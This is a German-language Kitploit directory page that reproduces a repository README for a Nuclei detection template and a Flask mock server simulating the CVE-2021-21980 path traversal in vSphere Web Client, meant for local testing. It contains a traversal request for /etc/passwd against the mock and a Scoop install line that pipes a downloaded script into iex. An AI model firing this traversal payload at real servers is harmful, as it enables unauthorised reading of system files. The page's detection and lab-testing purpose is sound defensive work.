Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2021-21980-mock-server — CVE-2021-21980 | Kitploit
Tools/GitHubGitHub/gui2000guix-ui/cve-2021-21980-mock-server
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubgui2000guix-ui/cve-2021-21980-mock-server

cve-2021-21980-mock-server

CVE-2021-21980

Repository anzeigen
3vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Clippy of the Dead – CVE-2021-21980 Testumgebung und Nuclei-Vorlage

=======================================================================

Dieses Repository enthält eine hochzuverlässige Nuclei-Vorlage zum Erkennen von CVE-2021-21980 (Path Traversal im vSphere Web Client) sowie eine kleine Mock-Umgebung, die das angreifbare Verhalten für sichere lokale Tests nachbildet.

Dateien:

  • cve-2021-21980.yaml: Nuclei-Vorlage mit mehreren Encoding-Varianten und Matchern
  • app.py: Eine kleine Flask-App, die die /eam/vib Path-Traversal-Schwachstelle simuliert
  • Dockerfile: Container-Image für den Mock-Server mit einem selbstsignierten TLS-Zertifikat
  • docker-compose.yml: Startet den Mock-Server und hört auf Host 8443
  • requirements.txt: Python-Abhängigkeiten

Haftungsausschluss

  • Dieses Repository dient ausschließlich Forschungs‑, Test- und Verteidigungszwecken. Verwenden Sie es nicht gegen ein System, zu dessen Scan Sie nicht berechtigt sind.
  • Dieser Mock-Server ist kein VMware vCenter; er simuliert lediglich das anfällige Verhalten für einen sicheren PoC/Test.
  • Lokale Ausführung (Windows PowerShell Beispiel)

    1. Mock-Container bauen und starten:
    root@kitploit:~
    cd C:\Benutzer\gui\Dokumente\hi
    docker-compose up --build -d
    

    Der Mock-Server lauscht auf https://localhost:8443 (selbstsigniertes TLS-Zertifikat).

    1. Schneller curl-Check (unsicher wegen selbstsigniertem Zertifikat):
    root@kitploit:~
    curl -k "https://localhost:8443/"  # sollte „VMware vSphere Web Client (mock)“ zurückgeben
    curl -k "https://localhost:8443/eam/vib?id=../../../../../../../../../../etc/passwd"
    

    Sie sollten den Inhalt der Mock-Datei /app/sensitive/passwd-mock erhalten.

    1. Nuclei ausführen (Nuclei muss installiert sein), um die Vorlage gegen den Mock-Server zu validieren:
    root@kitploit:~
    nuclei -t cve-2021-21980.yaml -u https://localhost:8443 -insecure
    
    1. Bei Erfolg sollte die Ausgabe einen Treffer für den PoC anzeigen.

    Testhinweise

    Wenn Sie viele Encoding-Varianten testen möchten, setzen Sie die Nuclei-Vorlage auf hohe Ausführlichkeit.

    • Dieser Mock-Server gibt die Mock-Datei zurück, die /etc/passwd nachbildet; in einer echten Umgebung würde /etc/passwd oder eine ähnliche Datei zurückgegeben werden, falls der Server anfällig ist. Automatisiertes Testskript

      Führen Sie run_local_test.ps1 aus. Das Skript baut den Container, wartet auf die Bereitschaft und führt die curl-Checks sowie ggf. Nuclei aus.

      root@kitploit:~
      powershell -ExecutionPolicy Bypass -File .\run_local_test.ps1
      

      Nuclei unter Windows schnell installieren:

      1. Mit Scoop (empfohlen):
      root@kitploit:~
      iwr -useb get.scoop.sh | iex
      scoop install coreutils
      scoop install nuclei
      
      1. Oder von den Releases herunterladen und zum PATH hinzufügen:
      root@kitploit:~
      Invoke-WebRequest -Uri https://github.com/projectdiscovery/nuclei/releases/latest/download/nuclei_windows_amd64.zip -OutFile nuclei.zip
      Expand-Archive -Path nuclei.zip -DestinationPath .\nuclei
      Add-Content -Path $PROFILE -Value 'set PATH=$Env:PATH;$(Resolve-Path .\nuclei)'
      

      Hinweise

      Falls nuclei nicht im PATH ist, führt run_local_test.ps1 nur die curl-Tests aus. Sollte der Docker-Build fehlschlagen, stellen Sie sicher, dass Docker Desktop installiert ist und die Option „Use the WSL 2 based engine“ aktiviert ist.

    Sicherheit: Holen Sie stets eine ausdrückliche Genehmigung ein, bevor Sie Systeme scannen oder ausnutzen.

    Tool herunterladen